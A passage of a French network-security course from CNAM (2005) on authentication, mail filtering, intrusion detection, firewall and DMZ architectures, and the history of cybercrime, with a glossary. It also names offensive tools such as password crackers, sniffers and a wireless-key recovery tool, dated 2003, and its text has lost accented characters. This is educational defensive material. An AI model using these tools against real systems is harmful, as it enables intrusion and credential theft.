CNAM Jean-Christophe GALLARD

Le choix final devra donc se faire en fonction des besoins des utilisateurs (en termes de
fonctionnalits mais galement en termes de niveau de scurit) et des capacits des
produits existants rpondre ces besoins.

Lauthentification
Lorsque lon interconnecte son rseau dentreprise un rseau public comme lInternet, il
devient alors tentant dautoriser des utilisateurs distants, cest dire non physiquement
raccord au rseau de lentreprise, accder au systme dinformation. Cest ce que lon
appelle lextranet : un rseau virtuel, constitu du systme dinformation principal, de
rseaux partenaires (filiales, entreprises co-traitantes, clients) et des ventuels
utilisateurs nomades (reprsentants de commerce, collaborateurs en dplacement).
Ds cet instant se pose non seulement le problme de la scurit des flux transitant entre
lutilisateur et le systme dinformation, mais galement celui de lauthentification de cet
utilisateur.
Pour ce qui concerne la scurit des flux rseaux, loffre VPN du march offre un niveau
de scurit correct mais elle ne permet didentifier que des machines et /ou des rseaux,
pas les utilisateurs de ces quipements. Dans ce contexte, il savre alors souvent
ncessaire de mettre en place une solution dauthentification qui aura pour but de combler
ce manque.
De nombreux produits et protocoles existent sur ce march, chacun satisfaisant des
niveaux de scurit plus ou moins lev. Depuis la simple authentification basique par
couple login/password, jusquaux solutions matrielles (carte puce, clefs USB,
calculettes), les niveaux de scurit atteints par ces mcanismes demeurent trs
variables.
On notera galement la prsence sur ce march des serveurs daccs distants,
autorisant des utilisateurs nomades se connecter au systme dinformation depuis un
rseau tlphonique commut. Ces serveurs intgrent la plupart des protocoles de
communications standards dans ce domaine (L2TP, PPTP, IPSEC, RADIUS, TACAS+).

Lanalyse de contenu et la dcontamination virale


Ces fonctions peuvent tre utilises lorsquun service de messagerie est rendu au travers
de linterconnexion. Cela permet de limiter certains problmes particuliers lis la
messagerie :

Propagation de virus (le plus souvent par pices jointes contenant du code
excutable).
Envoi de code excutable malicieux (pice jointe ou script dans un message
HTML).
Spam (courrier non sollicit envoy une longue liste de personnes).
Attaque par saturation de la messagerie.
Spoofing (courrier envoy en utilisant une adresse dmetteur usurpe).
Relayage de serveur de messagerie.
Fuite dinformations.
Utilisation abusive de la messagerie (par exemple messages de grand volume).

Les Proxys applicatifs des pare-feux apportent une solution partielle ces problmes
(limitation du nombre de destinataires, de la taille des messages, ).
Pour obtenir une protection plus efficace, on peut utiliser des outils qui surveillent tout le
trafic de messagerie, et analysent en dtail chaque message et ses pices jointes. Ces
outils danalyse de contenu sinterposent en tant que serveur de messagerie entre le

109

CNAM Jean-Christophe GALLARD

rseau extrieur et le serveur de messagerie interne. Certains produits peuvent


galement tre intgrs directement en tant que modules du serveur de messagerie.

Lanalyse de contenu

Les fonctions assures par les systmes danalyse de contenu sont les suivantes :

Dtection de spam ou dattaque par saturation : limitation sur le nombre de


destinataires ou dtection de messages dupliqus un grand nombre de fois,
gestion dune liste noire pour interdire certains metteurs ou sites abusifs (on peut
trouver des listes noires rgulirement mises jour sur Internet).
Anti spoofing : vrification (sommaire) de la provenance du message, en
demandant une requte DNS inverse sur le nom dhte ou le serveur metteur.
Blocage de certains types de pices jointes pouvant contenir du code malicieux
(excutables, VBscript, Javascript, ActiveX, Java, Word avec macros, etc.). On
peut galement retirer automatiquement les pices jointes douteuses des
messages pour transmettre uniquement le texte.
Blocage des messages contenant certains mots cls qui pourraient indiquer un
usage abusif de la messagerie (par exemple fuite dinformations avec la mention
secret dfense ).
Blocage des messages de trop grande taille.

Dans certains produits les messages bloqus sont placs en quarantaine o un


administrateur peut les tudier puis dcider de les laisser passer ou non.

La dcontamination virale
En gnral, un ou plusieurs antivirus peuvent tre utiliss pour analyser
chaque message lectronique transitant entre les rseaux. Si un message
est infect, il peut tre dsinfect automatiquement puis transmis son
destinataire.
Exemple de produits : gamme MIMEsweeper avec MAILsweeper (pour SMTP, Microsoft
Exchange, Lotus Domino), SECRETsweeper (messages chiffrs), InterScan VirusWall,
Mail Guard ou bien e-mail Sentinel.
Ce type de solution est actuellement trs en vogue sur le march des produits civils car
ces produits compltent efficacement les pare-feux pour la mise en uvre dune politique
de scurit. Il est noter cependant que ces produits peuvent offrir des fonctions et des
performances trs ingales du point de vue de la scurit.

La dtection dintrusion
Pour tracer et traquer un pirate, il faut des outils de surveillance afin danticiper ou rduire
les consquences de lattaque. Pour cela des capteurs sont ncessaires pour chacune
des phases de lattaque et sont indispensables pour sapercevoir au plus tt quune
tentative dattaque est en cours ou a dj eu lieu.
La mise en place des outils de protection comporte deux approches complmentaires :

une approche temps rel avec des outils produisant des alarmes en cas de
dtection dune signature dattaques sur le rseau, on peut alors parler de
dtection dintrusion,
une approche temps diffr avec des outils produisant des journaux daudit ou
logs permettant une analyse a posteriori, on peut alors parler danalyse
dattaques.

110

CNAM Jean-Christophe GALLARD

Les outils de dtection dintrusion (ou IDS, pour Intrusion Detection System) travaillent
directement sur les trames rseau. Ces outils de capture rseau sont communment
appels sondes ou senseurs, ils sont en gnral bass sur une sonde danalyse rseau
qui capture les trames rseau.
Le principe consiste rcuprer les donnes contenues dans la (ou les) trames rseau et
les comparer aux signatures dattaques contenues dans la base de donnes du produit.
Le traitement est ralis la vole et lalerte est envoye aussitt ladministrateur
scurit.
Afin de recueillir des informations sur les attaques provenant de lextrieur et de lintrieur,
il est prfrable de placer des sondes diffrents endroits stratgiques de larchitecture
rseau. Quelques produits fournissent la possibilit de fusionner les alarmes provenant de
lensemble des sondes au sein dun module dadministration centralise.
Le principal problme de la mise en uvre dun IDS rside dans son positionnement dans
larchitecture rseau.

En tte de pont dune interconnexion (cest dire devant le routeur/Firewall) :


LIDS enregistrera toutes les tentatives dintrusion, y compris celles qui auront
chou parce que bloques par llment de filtrage.
Si lon dsire manager cet lment distance ou plus simplement remonter les
alarmes sur une console centrale dispose sur le rseau interne, il sera
ncessaire de laisser passer les flux dadministration et de journalisation au
travers de llment de filtrage ce qui peut fragiliser la scurit de
linterconnexion, en particulier si lIDS est corrompu ; dans ce cas de figure, en
effet, il nest pas protg par llment de filtrage.

En DMZ :
LIDS ne dtectera que les tentatives dintrusion ayant russies passer llment
de filtrage, mais pas celles qui seront restes la porte de la DMZ.
Si lquipement de filtrage est corrompu, lintrusion sur le rseau interne risque de
ne plus passer par la DMZ et restera indtect.

Sur le rseau Interne :


On dtectera ici la fois les agressions internes et externes, mais seules les
intrusions russies et uniquement sur le rseau interne seront dtectes.

Principe de la zone dmilitarise (DMZ)


Le principe de la zone dmilitarise (ou DMZ, pour DeMilitarized Zone) consiste en un
rseau tampon tel que lensemble des changes entre un rseau interne et un rseau
externe transite par ce tampon.
Lobjectif recherch est que tous les changes passent par cette zone et quaucun
change direct ne se fasse entre le rseau interne et le rseau externe.
La DMZ peut hberger un certain nombre de services publics (serveur WEB pour
lexterne, serveur FTP, etc.) ainsi que des serveurs relais pour les services inter rseau
(messagerie, annuaire, etc.).
Les services de scurit offerts sont les suivants :

Un filtrage rseau entre les diffrents rseaux ainsi interconnects.


Des serveurs relais dans la DMZ pour grer le trafic interne/ externe.
111

CNAM Jean-Christophe GALLARD

Des antivirus/ analyseurs de contenus pour journaliser les changes et


dcontaminer les donnes entrant ou sortants conformment une politique de
scurit.
Des services publics et des serveurs relais permettant de masquer les services et
la topologie du rseau interne.

Ce type de solution savre trs complet du point de vue de la scurit. Cest une
architecture classique qui permet de mettre en uvre une politique de scurit volue
o les aspects de filtrage des changes sont complts par une analyse fine de ces
changes ainsi que par des fonctions de journalisation / sauvegardes des donnes
transitant par le systme dinterconnexion. Il est ainsi possible de mettre en place des
services dits publics destination dune communaut extrieure au sein de la DMZ.
Ce principe de DMZ tant gnrique, il existe plusieurs possibilits dimplmentation
dune telle zone.

Architectures types
Firewall Personnel
La figure ci-contre montre un ordinateur quip dun Firewall personnel et
raccord lInternet, par exemple par un lien modem. Le Firewall personnel
consiste en un programme spcifique, install sur la machine protger,
limitant les connexions entrantes et sortantes.
Lavantage majeur dun Firewall de ce type rside dans sa capacit
reconnatre quelle application tente une connexion sortante. Il est donc
possible dobtenir un filtrage particulirement fin dans lequel on peut, par
exemple, nautoriser quInternet Explorer ou Netscape Navigator raliser
des connexions sortantes sur les ports 80 (HTTP) et 443 (HTTPs). Dans ce
cas de figure, un cheval de Troie ou un ver programm pour interroger des
sites Web se verra bloqu par le Firewall, sans pour autant interdire la
navigation sur le Web par lutilisateur avec son navigateur prfr.
Ces solutions sont gnralement quipes dun module dapprentissage :
par dfaut le Firewall bloque toute connexion, mais chaque nouvelle
connexion le Firewall demande lutilisateur sil dsire lautoriser ou
linterdire, et sil souhaite crer une rgle permanente en ce sens.
Cette architecture permet dobtenir un bon niveau de scurit pour un particulier
souhaitant surfer sur le World Wide Web.
Cependant, quelques vulnrabilits peuvent tre exploites par des codes malveillant afin
de violer la politique de scurit, comme par exemple la possibilit offerte de piloter un
processus autoris (par API ou, mieux, par injection directe de code dans lespace
mmoire du processus autoris).

112

CNAM Jean-Christophe GALLARD

Firewall double attachement

Dans ce type darchitecture, le Firewall est un quipement ddi, install en coupure entre
un rseau interne et un rseau externe. Il sagit de la solution darchitecture la plus simple
mettre en uvre, permettant la protection dun sous rseau complet, mais elle souffre
de deux inconvnients :
Le Firewall est un lment critique de larchitecture, sa compromission entrane la
compromission de tout le rseau interne,
Les connexions sortantes se font directement entre lInternet et le rseau interne, ce qui
expose ce dernier des attaques directes.

Passerelle filtre

Dans ce type darchitecture, on utilise un routeur filtrant (ou un Firewall) en coupure entre
les deux rseaux. Le principe de filtrage consiste nautoriser que le Firewall, qui fait
alors office de passerelle dapplication, communiquer avec lextrieur.
Ainsi, les connexions sortantes et entrantes passent obligatoirement par un quipement
de filtrage applicatif. Encore une fois, lquipement dinterconnexion demeure un lment
critique dans la scurit densemble du systme.

113

CNAM Jean-Christophe GALLARD

Firewall et DMZ

Le principe de cette architecture consiste sparer les ordinateurs communiquant avec


lextrieur des autres machines. Le filtrage est ralis de telle sorte que seules les
communications Internet/DMZ et DMZ/Rseau Interne sont autorises, aucune
communication directe entre le rseau interne et lInternet nest donc possible.
Le Firewall doit disposer de trois attachements rseau. On positionne alors dans la DMZ
des serveurs (serveurs Web, passerelle de messagerie, DNS externe), et/ou des Proxys
permettant aux utilisateurs du rseau interne de se connecter lextrieur.
La scurit est mieux assure que dans les architectures prcdentes, mais le Firewall
reste toujours un lment critique

Double Firewall et DMZ

114

CNAM Jean-Christophe GALLARD

Dans cette architecture similaire la prcdente, on a choisi de positionner la DMZ en


sandwich entre deux Firewalls. Il sagit ici de lapplication stricte du principe de
dfense en profondeur ; dans le cas dune compromission du premier Firewall, le rseau
interne nest pas directement accessible puisque protg par le second Firewall, seuls les
lments de la DMZ pouvant alors tre attaqus.
Dans ce type darchitecture, il est recommand dutiliser deux Firewalls diffrents, afin
quune vulnrabilit exploitable sur lun ne puisse tre reproduite sur lautre. On peut
galement choisir un simple routeur filtrant comme lment de coupure entre la DMZ et le
rseau interne.

Solutions DMZ multiples

Ce type de solution constitue une variante scuritaire des deux prcdentes, dans
laquelle on pousse la logique de cloisonnement lextrme : les machines devant
communiquer avec lextrieur sont places dans des DMZ diffrentes, en fonction de
leurs rles.

Solution Basique quilibrage de charge

Dans les solutions prcdentes, deux menaces techniques ntaient pas prises en
compte :

En cas de panne dun quipement, tout ou partie de larchitecture se retrouve en


position de dni de service,
Ces architectures constituent un goulet dtranglement pour ce qui concerne les
flux rseaux, une saturation de lquipement dinterconnexion mne donc une
rapide chute des performances.

Il est alors possible de mettre en uvre un systme de redondance des quipements


dinterconnexion, permettant alors dassurer une contre-mesure efficace aux deux
problmes prcdemment dcrits. La figure suivante montre un exemple dune telle
architecture :

115

CNAM Jean-Christophe GALLARD

Dans le schma prsent, tous les quipements sont redonds. Les switches assurent
dune part une surveillance permanente des quipements auxquels ils sont raccords et,
dautre par, une surveillance mutuelle via le protocole VRPP (Virtual Router Redondancy
Protocol) sur une ligne ddie. En cas de panne dun quipement, le systme bascule
automatiquement le routage vers les lments encore disponibles.
Les lments actifs sont configurs pour rediriger le trafic en cas de saturation de la
bande passante dun des quipements vers le second, ou en simple quilibrage de
charge. Nota : les rponses aux requtes peuvent ne pas suivre le mme chemin que les
requtes qui les ont provoques.
Ce type darchitecture peut ainsi rsister une srie de pannes multiples (jusqu 50%
des quipements), tout en quilibrant la bande passante. Le schma suivant montre le
cheminement du trafic en cas de panne dun routeur, dun switch et dun Firewall :

116

CNAM Jean-Christophe GALLARD

Solutions Compltes quilibrage de charge


La solution prsente prcdemment ne constitue quune architecture de base pour
ce type de solution. Il reste toujours possible de compliquer lextrme larchitecture en
vue dune scurit maximale, voire paranoaque, mais ladministration densemble du
systme se complique elle aussi trs nettement.
Les schmas ci-dessous prsentent de tels exemples darchitecture quilibrage de
charge totalement redonde, incluant DMZ, VLAN dadministration et sonde de dtection
dintrusion.

117

CNAM Jean-Christophe GALLARD

=
F
=

"3
"
"
+

8GG

Les rseaux sont devenus indispensables au fonctionnement des systmes dinformation


modernes, et il nest plus possible aujourdhui dimaginer un systme qui pourrait sen
passer. En termes de scurit, ils demeurent souvent un vritable casse-tte, ncessitant
de jongler entre les besoins de communication, les fonctionnalits offertes par les
technologies et un niveau de scurit acceptable.
La mise en uvre dune politique de scurit efficace est dautant plus dlicate que le
domaine volue trs rapidement et quelle impose de nombreuses comptences tous
les niveaux.
Lutilisation dun rseau informatique peut donc savrer dangereuse, mais il existe des
moyens plus ou moins efficaces de se protger avec notamment :

Des solutions de raccordement adaptes,


Une organisation sans faille.

La scurit nest pas un produit,


cest un processus.
Bruce Schneier
Jean-Christophe GALLARD Rennes, 2005

119

CNAM Jean-Christophe GALLARD

Histoire de la cybercriminalit
1971

Un vtran de la guerre du Vietnam, John Draper, alias Captain


Crunch , dcouvre que le sifflet offert en cadeau dans une bote de
crales de la marque Captain Crunch met un son la frquence
exacte de 2600 Hz. Cette frquence servait lpoque loprateur de
tlphonie AT&T comme porteuse pour la signalisation tlphonique. Draper construit
alors une blue box exploitant cette tonalit pour tlphoner gratuitement sur le
rseau de AT&T.

Apparition du terme phreaker ; anglicisme intraduisible driv des mots phone et


hacker, et conu pour ressembler freak dsignant un cingl.

1973

Deux collgiens, Steve Wozniak et Steve Jobs, gagnent leurs premiers dollars en
revendant des blue-boxes leur entourage. Ils deviendront quelques annes plus tard
les fondateur de la firme Apple.

1973-74

Apparition du virus The creeper sur le systme dexploitation Tenex. Le


programme est dot de capacits de rplication au travers de lignes modem. Pour
radiquer ce logiciel est cr le programme The Reeper , premier anti-virus de
lhistoire de linformatique.

1981

Cration du Chaos Computer Club, premier groupe europen de hackers


organiss, en Allemagne.
Ian Murphy alias Captain Zero est officiellement la
premire personne inculpe pour un crime informatique, suite
son intrusion dans le systme informatique de AT&T, et la
modification du programme de facturation, tendant les
heures creuses toute la journe.
Les exploits de Murphy inspireront en 1992 le film Les
experts avec Robert Redford, Dan Aykroyd et River
Phenix.

1983

Le film War Games popularise les hackers et le phnomne du Cybercrime

1984

Formation du groupe de hackers Cult Of The Dead Cow Lubbock, Texas.


Premire parution du magazine lectronique 2600 .

1985

Le premier numro du journal lectronique Phrack voit le jour.

121

CNAM Jean-Christophe GALLARD

1986

Le premier virus informatique infectant les IBM PC voit le jour au


Pakistan, il se nomme Brain et infecte les ordinateurs IBM. La
premire loi contre la fraude informatique est vote par le congrs
amricain. Elle rend punissable par la loi, laccs non autoris aux
ordinateurs du gouvernement.

1987

Le virus Jerusalem est dtect. Il est conu pour supprimer les fichiers infects les
vendredi 13, cest un des premiers virus capable dinfecter et de dtruire des fichiers.

Cration du premier Computer Emergency Response Team (CERT) aux USA.

1988

Robert T. Morris, alias RTM, tudiant luniversit de Cornell et fils


dun scientifique de la NSA, lche accidentellement dans la nature le
premier ver Internet qui va se rpandre sur 6000 machines
connectes. Il sera condamn 3 mois de prison avec sursis et 10.
000 dollars damende.

Kevin Mitnick est condamn un an de prison suite son intrusion dans le systme
de messagerie de la socit DEC.

1989

Le cyber-criminel Dark Avenger cr le virus informatique Avenger.1808, qui se


propage dun ordinateur un autre dtruisant toutes les donnes son passage. A la
fin de lanne, on recense une trentaine de virus.

Dans la premire affaire de cyber-espionnage, un pirate allemand, manipul par le


KGB, est arrt pour stre introduit dans des ordinateurs du ministre de la dfense
amricain. Son arrestation est luvre de Clifford Stoll, informaticien luniversit de
Berkeley, qui relatera cette histoire dans un livre ; le nid du coucou .

1990

Dbut de la guerre entre deux groupes de hackers rivaux, Legion of Doom et


Masters of Deception . Ces deux groupes vont pirater des lignes tlphoniques
avec comme seul objectif de russir s'
introduire dans les ordinateurs du groupe
rival.
Kevin Poulsen, alias Dark Dante, est arrt aprs avoir dtourn tous les
appels entrants dans une station de radio de Los Angeles, dans le but de
gagner la Porsche mise en jeu pour loccasion.

1991

Apparition du virus Michelangelo . Le virus est conu pour dtruire les donnes sur
les PCs le 6 Mars, date de la naissance de Michel Ange.

Dark Avenger cr le Mutation Engine , un moteur logiciel permettant de rendre


des virus polymorphes, cest dire pouvant se transformer en plus de 4.000 milliards
de formes diffrentes, et donc extrmement difficiles dtecter. Dark Angel et Nowhere
Man lancent le premier gnrateur de virus, fonctionnant de manire simple, il permet
nimporte qui de crer un virus.
A la fin de lanne on recense plus de 1.000 virus en circulation.

122

CNAM Jean-Christophe GALLARD

1993
Premire dition de la confrence DEFCON Las Vegas.

1994

Le mathmaticien russe Vladimir Levin sintroduit sur le rseau bancaire Swift et


dtourne 10 millions de dollars la Citibank. Il sera condamn trois ans de prison
par un tribunal amricain.
Mark Abene, alias Phiber Optik, un des leaders du groupe de pirates
Masters of Deception est emprisonn pour avoir dtourn des lignes
tlphoniques. A sa libration, il sera nomm par le magazine New York
Magazine dans le top 100 des plus intelligentes personnalits de la ville.

1995

Traqu par le FBI depuis 7 ans sous le pseudonyme de Condor, Kevin


Mitnick est arrt en janvier 1995 avec laide de linformaticien Shimomura
Tsutomu. Le FBI lui reproche davoir drob 20.000 numros de cartes de
crdit, procd des fraudes lectroniques et dtre en possession de
fichiers confidentiels vols des socits comme Motorola et Sun Microsystems. Il
sera condamn 5 ans de prison. A sa sortie en 2000, il sera interdit daccs aux
tlphones, rseaux et ordinateurs.
A la fin de lanne on recense plus de 40.000 virus en circulation.

1996

Apparition de Concept, le premier virus macro infectant les documents Word.

1997

La brigade des mineurs dclenche l'


opration Achille dans toute la France. Elle vise
les milieux pdophiles qui communiquent sur internet. 55 personnes sont interpelles
et 11 sont mises en examen.

1998

Cult of the Dead Cow, un groupe de hackers, dveloppe, loccasion du


congrs DEFCON, le logiciel Back Orifice, un cheval de Troie volu
permettant un accs complet aux PC infects

1999

Une version plus puissante de Back Orifice fait son apparition : Back Orifice 2000

Le virus Melissa, cr par David Smith, sme la panique dans le monde et cause plus
de 80 millions de dollars de dgts.

2000

Premire attaque en dnis de service distribu sur les serveurs de socits symboles
de la nouvelle conomie.

Des centaines de milliers dinternautes dans le monde reoivent par mail une
dclaration damour : I LoveYou .
A suivre

123

CNAM Jean-Christophe GALLARD

Outils de scurit
La liste suivante est trs largement inspire de la page Top 75 security tools ,
disponible sur le site Internet de Fyodor, auteur de loutil nmap
(http://www.insecure.org/tools.html).
Nota : la dernire mise jour de cette partie du cours date de lanne 2003.
Pour chaque outil, on prcise les points suivants :
Outil commercial, payant, parfois disponible en version limite.
Outil disponible pour plate-forme Linux.
Outil disponible pour plate-formes FreeBSD/NetBSD/OpenBSD et/ou UNIX
propritaire (Solaris, HP-UX, IRIX, etc.).
Outil disponible pour plate-forme Windows.
OS

Description
Achilles
http://achilles.mavensecurity.com/
Un outil de type web Proxy , permettant de raliser des attaques de type
man in the middle sur le protocole HTTP.
AirSnort
http://airsnort.shmoo.com/
AirSnort est un outil pour rseaux sans fils, permettant de retrouver les clefs de
chiffrement de ces rseaux.
Cain & Abel
http://www.oxid.it/cain.html
Le l0phtcrack du pauvre .
Un outil permettant de retrouver les mots de passe dans les environnements
Windows (essentiellement Windows 95 et 98).
Crack / Cracklib
?>>>: :
: :@A
Le premier cracker de mots de passe Unix du genre, par Alec Muffec.
Dsniff
http://naughty.monkey.org/~dugsong/dsniff/
Un ensemble doutils pour laudit rseau et la pntration de systmes,
partiellement ports et maintenus sous Windows.
Ethereal
http://www.ethereal.com/
Un sniffer rseau performant et surtout gratuit !

Ettercap
http://ettercap.sourceforge.net/
Ettercap est un outil en ligne de commande pour sniffer / intercepter / enregistrer
125

CNAM Jean-Christophe GALLARD

OS

Description
les communications sur un rseau.

Firewalk
http://www.packetfactory.net/projects/firewalk/
Firewalk est un traceroute amlior, permettant la fois la dcouverte de
nuds intermdiaires mais galement les options de filtrages positionnes.
Fport
http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcon
tent=/resources/proddesc/fport.htm
Fport est un netstat amlior, permettant de montrer localement quels sont
les ports de services ouverts et quelles applications coutent sur ces ports. Ne
tourne que sous Windows (sous Linux, la commande netstat pan a le mme
effet).
Fragroute
http://www.monkey.org/~dugsong/fragroute/
Outil de test de routeurs filtrants et de Firewalls.

GFI Languard
http://www.gfi.com/lannetscan/
Un outil rseau dnumration pour machines Windows, agrment dune GUI.
Fonctionne selon les mmes principes que Winfingerprint.
Hping2
http://www.hping.org/
Un gnrateur de paquets rseau capable danalyser les rponses aux requtes
mises. Le complment indispensable nmap.
Hunt
http://lin.fsid.cvut.cz/~kra/index.html#HUNT
Un outil de captures rseau, permettant dimplmenter des attaques de type TCP
Hijacking.

?>>>: :
:

B <

<
<

B
: C

;:
John the ripper
http://www.openwall.com/john/
Un cracker de mots de passe multi-plateformes. Permet de casser les mots de
passe Unix et NT, par brute force et dictionnaires avec ou sans rgles de
compositions
Kismet
http://www.kismetwireless.net/
Un trs puissant sniffer pour rseaux sans fils (802.11b).

L0phtcrack
http://www.atstake.com/research/lc/
Un cracker de mots de passe pour Windows NT. Particulirement rapide en
126

CNAM Jean-Christophe GALLARD

OS

Description
attaque exhaustive.
NBTScan
http://www.inetcat.org/software/nbtscan.html
Un outil rseau dnumration pour machines Windows. Fonctionne selon les
mmes principes que Winfingerprint.
Nessus
http://www.nessus.org/
<

Nmap
?>>>:
:*
Le scanner de port de service le plus complet lheure actuelle, par Fyodor.
Inclut un module de dtection de systmes dexploitation. La version Windows
est gnralement en retard par rapport la version Unix.
Netcat
http://www.atstake.com/research/tools/network_utilities/
Lincontournable couteau suisse du rseau.
Outil en ligne de commande.
Network Stumbler
http://www.stumbler.net/
Un autre sniffer pour rseaux sans fil 802.11, trs employ pour le wardriving.
Ngrep
http://www.packetfactory.net/projects/ngrep/
Le grep du rseau. Permet de raliser des captures rseaux.

Nikto
http://www.cirt.net/code/nikto.shtml
Un scanner de vulnrabilits HTTP trs complet.

N-Stealth
http://www.nstalker.com/nstealth/
Un autre scanner de vulnrabilits, commercial cette fois et plus souvent mis
jour que dautres scanners du mme type.
Ntop
http://www.ntop.org/
Le top (utilitaire unix doccupation du CPU) du rseau. Permet de monitorer le
trafic sur un rseau.
Pwdump3
http://www.polivec.com/pwdump3.html
Rcupre la base des comptes Windows NT (base SAM) et la formate sous la
forme dun fichier rcuprable par John The Ripper et L0phtcrack.
Retina
http://www.eeye.com/html/Products/Retina/index.html
Un autre scanner de vulnrabilits gnraliste, tout comme Nessus et ISS.
127

CNAM Jean-Christophe GALLARD

OS

Description
SAINT
http://www.saintcorporation.com/saint/
Security Administrator'
s Integrated Network Tool.
Un scanner de vulnrabilits rseaux, issu des travaux de Dan Farmer sur
SATAN.
Sam Spade
http://www.samspade.org/ssw/
Un outil rseau assez gnraliste avec une belle interface graphique et
permettant de nombreuses requtes (ping, nslookup, traceroute, dns queries,
finger, raw HTTP web browser, SMTP relay checks).
SARA
http://www-arc.com/sara/
Security Auditors Research Assistant. Un autre outil danalyse de vulnrabilits
gnrique.
Snort
http://www.snort.org/
Le systme de dtection dintrusion rseau Open Source, bas sur des
signatures dattaques.
SolarWinds ToolSets
http://www.solarwinds.net/
Une impressionnante collection doutils dinvestigation rseau.
SuperScan
http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcon
tent=/resources/proddesc/superscan.htm
Un scanner de ports de services graphique.
TCPDump / Windump
http://www.tcpdump.org/ et http://windump.polito.it/
Le trs classique outil de capture rseau.

Whisker / LibWhisker
http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=2
Un scanner de vulnrabilits HTTP crit en Perl.

Winfingerprint
http://winfingerprint.sourceforge.net/
Un outil rseau danalyse de machines Windows pour numrer les utilisateurs,
les groupes, les partages
Xprobe2
http://www.sys-security.com/html/projects/X.html
Un outil rseau spcifiquement dvelopp par Ofir Atkin et Fyodor pour la
dtection de systmes dexploitations. Fonctionne par un algorithme logique
floue.

128

CNAM Jean-Christophe GALLARD

Glossaire
ARP :

Address Resolution Protocol. Protocole de rsolution dadresse


permettant de trouver ladresse IP correspondant une machine dont on
ne connat que ladresse MAC.
ACL :
Access Control List. Liste contrle daccs, utilise pour positionner des
permissions sur des objets.
Adresse IP : Adresse rseau de niveau 3 pour le protocole IP. Une adresse IP est
constitue de 4 octets.
Adresse MAC : Adresse rseau de niveau 2.
Client :
Un client est un logiciel demandant des services un programme situ
en local ou distance qui gre linformation, le serveur. Par extension, la
machine sur laquelle fonctionne le logiciel client.
Commutateur : Voir Switch.
Concentrateur : Voir Hub.
CPL :
Courant Porteur en Ligne.
CPU :
Control Process Unit. Synonyme de Microprocesseur.
CSMA/CD :
Carrier Sense Multiple Access / Collision Detection. Protocole de
rsolution de conflits daccs concurrents un mdia.
Datagramme : Voir Paquet.
DMZ :
DeMilitarized Zone. Zone dmilitarise. Constitue un rseau tampon
entre deux rseaux.
DNS :
Domain Name Server. (Cf. serveur de noms, adresse IP)
Ethernet :
Protocole rseau de niveau 1 et 2, permettant le transit dinformation sur
un brin physique. Ethernet dfinit la fois les couches 1 (physique) et 2
(Contrle de lien logique).
Firewall :
Elment actif de rseau de niveau 3 et suprieur, assurant des
mcanismes de filtrage.
FTP :
File Transfert Protocol. Permet de recevoir ou mettre des fichiers sur un
site connect au rseau. Souvent, les sites FTP contiennent des archives
du domaine public et sont accessibles de faon anonyme, sans devoir
possder un accs sur le poste distant (anonymous ftp).
Hash :
Motif binaire, rsultat dun calcul (gnralement cryptographique), appel
Fonction de Hachage, sur un flux doctets. Permet dobtenir une
empreinte, ou signature, dun flux doctets.
HomePlug :
Norme utilise pour la gestion des courant porteurs en ligne.
HTTP :
HyperText Transport Protocol. Protocole utilis pour le transfert des
pages web.
Hub :
Equipement rseau de niveau 2, fonction sur un principe de diffusion des
trames.
ICMP :
Internet Control Message Protocole. Protocole de contrle de flux de
niveau 3 et 4.
IETF :
Internet Engineering Task Force. Groupe de normalisation des
technologies utilises sur lInternet.
IHM :
Interface Homme Machine.
IP :
Internet Protocol. Protocole rseau de niveau 3 utilis sur lInternet.
IPSEC :
IP Secure. Protocole permettant dassurant une protection en
confidentialit et en intgrit sur les paquets IP transitant sur un rseau.
Kerberos :
Protocole dauthentification, dvelopp dans le cadre du projet Athena du
Massachusetts Institute of Technology.
L2F :
Layer 2 Forwarding : protocole dencapsulation de PPP.
L2TP :
Layer 2 Tunneling Protocole : protocole dencapsulation de PPP.
LAN :
Local Area Network. Rseau local.
MAC :
Medium Access Control. Sous couche rseau de niveau 2 permettant de
rsoudre les problmes daccs concurrent un mdium.
Mail / E-mail : Messages lectroniques (expditeur vers destinataire).
NNTP :
Network News Transport Protocol : Protocole de transfert de news
utilisant TCP sur le rseau.
129

CNAM Jean-Christophe GALLARD

Paquet :

Ensemble cohrent de donnes constituant constituant une unit de


traitement dun protocole de niveau 3. Exemples : paquet IP, paquet X25.
Egalement synonyme de Datagramme.
Point daccs : Elment dun rseau sans fil permettant daccder au rseau.
PPP :
Point to Point Protocol : protocole de communication en mode point
point.
PPTP :
Point to Point Tunneling Protocol : protocole dencapsulation de PPP,
dfini par Microsoft.
Proxy :
Relais applicatif.
RARP :
Reverse Address Resolution Protocol. Protocole de rsolution dadresse
permettant de trouver ladresse MAC correspondant une machine dont
on ne connat que ladresse IP.
Rcursif :
Voir Rcursif.
Rseau sans fil : Rseau informatique utilisant les ondes radio comme mdia au lieu
des cbles mtalliques ou optiques. Diverses normes et protocoles
existent actuellement, comme 802.11 et BlueTooth.
RFC :
Request For Comment. Nom donn aux standards proposs par lIETF.
Routeur :
Elment actif de rseau permettant le passage dun paquet vers un autre
rseau.
RTC :
Rseau Tlphonique Commut.
RTP :
Real-time Transport Protocol : protocole de transport de la voix sur IP.
Segment :
Ensemble cohrent de donnes constituant une unit de traitement dun
protocole de niveau 4. Exemples : segment TCP, segment UDP.
Serveur :
Logiciel traitant les requtes des clients et, par extension, le poste sur
lequel tourne le logiciel.
Serveur de noms :
Un serveur de correspondance entre adresse IP et nom de
machine. Voir DNS.
SIP :
Session Initiation Protocole : protocole de contrle pour la voix sur IP.
SMTP :
Simple Mail Transfert Protocol. Protocole de messagerie.
SNMP :
Simple Network Management Protocol. Protocole dadministration de
rseau.
SQL :
Structured Query Language : Langage de requte structur.
SSL :
Secure Socket Layer. Protocole scuris de niveau 4.
SRTP :
Secure Real-time Transport Protocol : protocole scuris de transport de
la voix sur IP.
Switch :
Equipement rseau de niveau 2, fonctionnant sur un principe de
commutation des trames.
TCP :
Transmission Control Protocol. Protocole rseau de niveau 4 offrant une
liaison fiable entre deux postes.
TCP/IP :
Transmission Control Protocol / Internet Protocol. Ensemble de 2
protocoles qui dfinit les notions dadresse de machine, de numro de
port (utilisable pour diffrencier les protocoles de haut niveau comme ftp,
http, etc.), de datagramme (paquet de donnes). Utilis sur lInternet pour
tablir et maintenir des connexions de bout en bout.
Trame :
Ensemble cohrent de donnes constituant une unit de traitement
lmentaire dun protocole de niveau 2. Exemples : trame Ethernet,
trame FDDI.
TTL :
Time To Live. Champ particulier dun paquet IP indiquant le nombre de
